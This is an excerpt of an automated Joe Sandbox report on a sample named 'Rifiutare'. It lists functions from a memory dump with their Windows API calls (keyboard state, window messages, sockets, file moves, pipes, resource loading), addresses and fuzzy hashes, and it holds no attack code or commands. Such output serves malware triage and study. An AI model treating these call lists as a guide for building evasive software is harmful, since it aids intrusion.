                                                                                  • Part of subcall function 00C9082D: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90865
                                                                                  • Part of subcall function 00C9082D: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90873
                                                                                  • Part of subcall function 00C9082D: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?), ref: 00C90883
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00CB5425
                                                                                • _wcslen.LIBCMT ref: 00CB552D
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00CB55A3
                                                                                • CoTaskMemFree.OLE32(?), ref: 00CB55AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 614568839-2785691316
                                                                                • Opcode ID: cd6b48502885a98c63a030d8943c0a494064e1a91d44d47114c19073358d3503
                                                                                • Instruction ID: ef0cf42897b24e27c0dcdf0d5bc42e8f8314f9361e0bf6d0502e4366dc9072ec
                                                                                • Opcode Fuzzy Hash: cd6b48502885a98c63a030d8943c0a494064e1a91d44d47114c19073358d3503
                                                                                • Instruction Fuzzy Hash: 2F91F771D006199FDF25DFA4D881EEEBBB9BF08300F104569E915A7291EB709E48DFA0
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 00CC285D
                                                                                • GetMenuItemCount.USER32(00000000), ref: 00CC288F
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC28B7
                                                                                • _wcslen.LIBCMT ref: 00CC28ED
                                                                                • GetMenuItemID.USER32(?,?), ref: 00CC2927
                                                                                • GetSubMenu.USER32(?,?), ref: 00CC2935
                                                                                  • Part of subcall function 00C94251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9426B
                                                                                  • Part of subcall function 00C94251: GetCurrentThreadId.KERNEL32 ref: 00C94272
                                                                                  • Part of subcall function 00C94251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C92DB3), ref: 00C94279
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CC29BD
                                                                                  • Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4196846111-0
                                                                                • Opcode ID: 355f4c8cd14e6cae19ff802cd45cc03240238e467b43f360d13b8dd7ef92c7e9
                                                                                • Instruction ID: 88db3ba60526defefe7844cd0bcebd968a262c8f6eabb56ff43b7c524572de2a
                                                                                • Opcode Fuzzy Hash: 355f4c8cd14e6cae19ff802cd45cc03240238e467b43f360d13b8dd7ef92c7e9
                                                                                • Instruction Fuzzy Hash: EC715C75A00205AFCB04EF65C885FAEBBB5EF48310F14846DE866EB351DB34EA41DB90
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00CC853F
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00CC854B
                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CC8626
                                                                                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CC8659
                                                                                • IsDlgButtonChecked.USER32(?,00000000), ref: 00CC8691
                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00CC86B3
                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CC86CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                • String ID:
                                                                                • API String ID: 4072528602-0
                                                                                • Opcode ID: c25e2b5a024a6a5bdd56e656e0bdafdfd4b1bf2de44c6602852602aafa9d1c6a
                                                                                • Instruction ID: 87c5a97460314138414b8ea68876d34bb6ed2fe84c0e856ffe3ed10c217aa0a9
                                                                                • Opcode Fuzzy Hash: c25e2b5a024a6a5bdd56e656e0bdafdfd4b1bf2de44c6602852602aafa9d1c6a
                                                                                • Instruction Fuzzy Hash: 9A719A74A00205AFEF219F54C884FABBBB9EF09310F14405DF966972A1CB71AE49DB54
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00C9B71D
                                                                                • GetKeyboardState.USER32(?), ref: 00C9B732
                                                                                • SetKeyboardState.USER32(?), ref: 00C9B793
                                                                                • PostMessageW.USER32(00000000,00000101,00000010,?), ref: 00C9B7C1
                                                                                • PostMessageW.USER32(00000000,00000101,00000011,?), ref: 00C9B7E0
                                                                                • PostMessageW.USER32(00000000,00000101,00000012,?), ref: 00C9B821
                                                                                • PostMessageW.USER32(00000000,00000101,0000005B,?), ref: 00C9B844
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: d0a0329dee490e2a6cca77a5a908cd3094419e9aefce443627e3768530f02455
                                                                                • Instruction ID: 9c36a4bc1ef3365751579e26fb3adb9342c64bc083a236860eeb698d69dea88b
                                                                                • Opcode Fuzzy Hash: d0a0329dee490e2a6cca77a5a908cd3094419e9aefce443627e3768530f02455
                                                                                • Instruction Fuzzy Hash: 045102A0A047D57DFF364274DD4DBBABEA95B46300F088989E0E5458D2C7E8EEC4E760
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00C9B53D
                                                                                • GetKeyboardState.USER32(?), ref: 00C9B552
                                                                                • SetKeyboardState.USER32(?), ref: 00C9B5B3
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C9B5DF
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C9B5FC
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C9B63B
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C9B65C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 7ed4ebe77bdcf72c4622f2f1e88c617d0ff742a297ed5ee41b3dd7a6a121d689
                                                                                • Instruction ID: 7ea577e3d9dbde2812bcadda3fb9353b29498db2ff56428ca23b423ccc4bcb01
                                                                                • Opcode Fuzzy Hash: 7ed4ebe77bdcf72c4622f2f1e88c617d0ff742a297ed5ee41b3dd7a6a121d689
                                                                                • Instruction Fuzzy Hash: CF51E6A09087DA7EFF368734DD59B7ABEA95B05700F088489F0E9468C2D794FE84E750
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C65FC3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C65890
                                                                                • __fassign.LIBCMT ref: 00C6590B
                                                                                • __fassign.LIBCMT ref: 00C65926
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C6594C
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,00C65FC3,00000000,?,?,?,?,?,?,?,?,?,00C65FC3,?), ref: 00C6596B
                                                                                • WriteFile.KERNEL32(?,?,00000001,00C65FC3,00000000,?,?,?,?,?,?,?,?,?,00C65FC3,?), ref: 00C659A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: c24b1bcab0ab2a2eaa6d74f22da530ff1871c04b4e03209c83a04ad524bfc075
                                                                                • Instruction ID: 6bffd51d9b69a8a58acc9e033bccfce7d04259f05dc1edd724a4100998c43a4d
                                                                                • Opcode Fuzzy Hash: c24b1bcab0ab2a2eaa6d74f22da530ff1871c04b4e03209c83a04ad524bfc075
                                                                                • Instruction Fuzzy Hash: 3551A775E00649DFDB20CFA8D885BEEBBF9EF09310F24415AE556E7291D7309A42CB60
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00C5316B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00C53173
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00C53201
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00C5322C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00C53281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 8271d071af62a6112a72e49815611b7f4d32bd0d680c12b64cdabc02d5b79968
                                                                                • Instruction ID: 43d3a14b0de15732f2f6aa3c3b76766623cf48ad1ad7cca223f112b12ddfb170
                                                                                • Opcode Fuzzy Hash: 8271d071af62a6112a72e49815611b7f4d32bd0d680c12b64cdabc02d5b79968
                                                                                • Instruction Fuzzy Hash: 6841D638A006889BCF10DF78CC45AAE7BB5AF44395F148155EC256B392D731DB89CB94
                                                                                APIs
                                                                                  • Part of subcall function 00CB3821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
                                                                                  • Part of subcall function 00CB3821: _wcslen.LIBCMT ref: 00CB386E
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB1958
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB1967
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB1A0F
                                                                                • closesocket.WSOCK32(00000000), ref: 00CB1A3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 2675159561-0
                                                                                • Opcode ID: 13820e295623636aef6f0fd374eab60ff0d9c33eaada38ffd0ac586893891665
                                                                                • Instruction ID: 0944e7f76aa7b88fd084b45fc7b96f1ac8e41c6bd9d50bb6180bbda3a494b37d
                                                                                • Opcode Fuzzy Hash: 13820e295623636aef6f0fd374eab60ff0d9c33eaada38ffd0ac586893891665
                                                                                • Instruction Fuzzy Hash: E741B631600254AFDB109F24C895BEEB7E9EF45364F188069FC5AAB291C774EE41CBE1
                                                                                APIs
                                                                                  • Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C9D678,?), ref: 00C9E5C6
                                                                                  • Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C9D678,?), ref: 00C9E5DF
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00C9D69B
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00C9D6D5
                                                                                • _wcslen.LIBCMT ref: 00C9D75B
                                                                                • _wcslen.LIBCMT ref: 00C9D771
                                                                                • SHFileOperationW.SHELL32(?), ref: 00C9D7B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 3164238972-1173974218
                                                                                • Opcode ID: 29642b64d66e02c82ff9e4efed9b65d178768def0f9593ace9d775ef091f1a15
                                                                                • Instruction ID: 6375bd1aa3fc104d9ad664a74c8e9467fe7c08d70061524df17350dc4dec36ad
                                                                                • Opcode Fuzzy Hash: 29642b64d66e02c82ff9e4efed9b65d178768def0f9593ace9d775ef091f1a15
                                                                                • Instruction Fuzzy Hash: CD417771D452189EDF12EFA4D985EDE73B8AF18380F1000E6E50AFB142EB35A788DB50
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CC34F6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC3529
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC355E
                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CC3590
                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CC35BA
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC35CB
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC35E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 1e69a84e7bf0eebe10b47a25bc8c0163a6e76c4a707ce1814be9d8aace9f405d
                                                                                • Instruction ID: e9c5e706915ca754d4c703484be27c0f5a64ef967691cf2470252d37ab661e31
                                                                                • Opcode Fuzzy Hash: 1e69a84e7bf0eebe10b47a25bc8c0163a6e76c4a707ce1814be9d8aace9f405d
                                                                                • Instruction Fuzzy Hash: D7312430649294AFDB21CF08EC88F6837A0FB8A720F144168F556CB2B2CB71EA41DF10
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9805E
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C98084
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00C98087
                                                                                • SysAllocString.OLEAUT32 ref: 00C980A8
                                                                                • SysFreeString.OLEAUT32 ref: 00C980B1
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00C980CB
                                                                                • SysAllocString.OLEAUT32(?), ref: 00C980D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: d0180398ac5a024078a4778bedd7884d0efef1085217c08dae227b857064e5af
                                                                                • Instruction ID: 0e02a1bce8059a4e7739211f3cf8fde8d272541bb8557edab0cb46192cb0629e
                                                                                • Opcode Fuzzy Hash: d0180398ac5a024078a4778bedd7884d0efef1085217c08dae227b857064e5af
                                                                                • Instruction Fuzzy Hash: CF218875200204AFDF14DFA9DC8CDAE77ECEB093607008126FA15CB2A1DA70ED89C764
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00CA0D4C
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA0D88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 6638ec650faefdabbd1e0b9484d87e152e7e308561e536ae26ead8e86150151d
                                                                                • Instruction ID: 84b0ac5f509c4c1fd7d64249092f7a6df492e6c1e5c2e75acb278a21b65062bd
                                                                                • Opcode Fuzzy Hash: 6638ec650faefdabbd1e0b9484d87e152e7e308561e536ae26ead8e86150151d
                                                                                • Instruction Fuzzy Hash: EA215E76900307EFDB208FA9D845F997BA4AF467A8F304A29F8A1D71D0D770E941CB50
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00CA0E20
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA0E5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: a46d3cec468e9b74889fcfdc9a3e0ed424f6578d016df97c71057a5c2b5efbd0
                                                                                • Instruction ID: d315d64e87425e56a02783394a5847a241e17584e3cbee491b2eaf5af325cfc5
                                                                                • Opcode Fuzzy Hash: a46d3cec468e9b74889fcfdc9a3e0ed424f6578d016df97c71057a5c2b5efbd0
                                                                                • Instruction Fuzzy Hash: 62213D715013069FDB208F69D844F9A77A8AF567A8F300E19F8F1D32D0D7719951EB90
                                                                                APIs
                                                                                  • Part of subcall function 00C36DB1: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C36DEF
                                                                                  • Part of subcall function 00C36DB1: GetStockObject.GDI32(00000011), ref: 00C36E03
                                                                                  • Part of subcall function 00C36DB1: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C36E0D
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CC47EE
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CC47FB
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CC4806
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CC4815
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CC4821
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 4687a978a9c548b61c780ec57bf365d191155f0717b4c13d3921ee5166ace38b
                                                                                • Instruction ID: af5c56a2eaac2ad25b04b2443f7003a49fd6e1e50a15b120aa446e9d06310fd2
                                                                                • Opcode Fuzzy Hash: 4687a978a9c548b61c780ec57bf365d191155f0717b4c13d3921ee5166ace38b
                                                                                • Instruction Fuzzy Hash: 6B1193B155021D7EEF118F64CC85EE77F9DEF08798F018120FA14E2190C6719C61DBA0
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C73BC0,?,?,00000000,00000000), ref: 00CA38F0
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C73BC0,?,?,00000000,00000000), ref: 00CA3907
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35), ref: 00CA3917
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35), ref: 00CA3928
